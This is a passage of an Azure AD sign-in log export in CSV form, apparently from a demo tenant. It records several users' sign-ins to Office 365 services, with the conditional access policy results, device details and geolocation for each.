1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",368167e5-753b-476f-b20c-ef020c501100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,368167e5-753b-476f-b20c-ef020c501100,SigninLogs,Sucess,33.7984581,-84.38828278
+919,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:00.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0967dad5-b8d2-49df-9bcd-f2b148cea44d,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8d371308-4e1f-476f-97d6-c0ea05801400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,8d371308-4e1f-476f-97d6-c0ea05801400,SigninLogs,Sucess,33.7984581,-84.38828278
+920,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:39.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,98643d5b-d98b-4b5e-9403-2d8a4f7695d5,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",49d93d44-ab6a-4881-b533-762619301400,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,49d93d44-ab6a-4881-b533-762619301400,SigninLogs,Sucess,50.6406517,5.572050095
+921,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:55.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,abce4b92-c0f0-4565-8f5c-0c47e52f3dc7,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",49d93d44-ab6a-4881-b533-762649321400,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,49d93d44-ab6a-4881-b533-762649321400,SigninLogs,Sucess,50.6406517,5.572050095
+922,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:39.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,92115e61-b1ce-4b90-bc5e-1a0214692a3b,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",f05c8354-7e46-4145-8055-705673901300,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,f05c8354-7e46-4145-8055-705673901300,SigninLogs,Sucess,50.6406517,5.572050095
+923,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:00.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0967dad5-b8d2-49df-9bcd-f2b148cea44d,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",8d371308-4e1f-476f-97d6-c0ea05801400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,8d371308-4e1f-476f-97d6-c0ea05801400,SigninLogs,Sucess,33.7984581,-84.38828278
+924,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:20.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7b0e3f8a-54d9-4d5b-a2ca-4dbe9d3b6ed0,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:22,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",7177d659-5709-4c9c-976e-940f1e101300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,7177d659-5709-4c9c-976e-940f1e101300,SigninLogs,Sucess,41.90428925,-85.99833679
+925,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:23.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,dc705be2-6d66-4d56-94b6-d6852d2ca4f0,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",db9d2eaf-e3fe-45a9-85f6-9ccaf8cf1100,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,db9d2eaf-e3fe-45a9-85f6-9ccaf8cf1100,SigninLogs,Sucess,50.6406517,5.572050095
+926,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:46.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9ea6d5cf-12cf-4b88-9a2e-d97f7df50550,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': 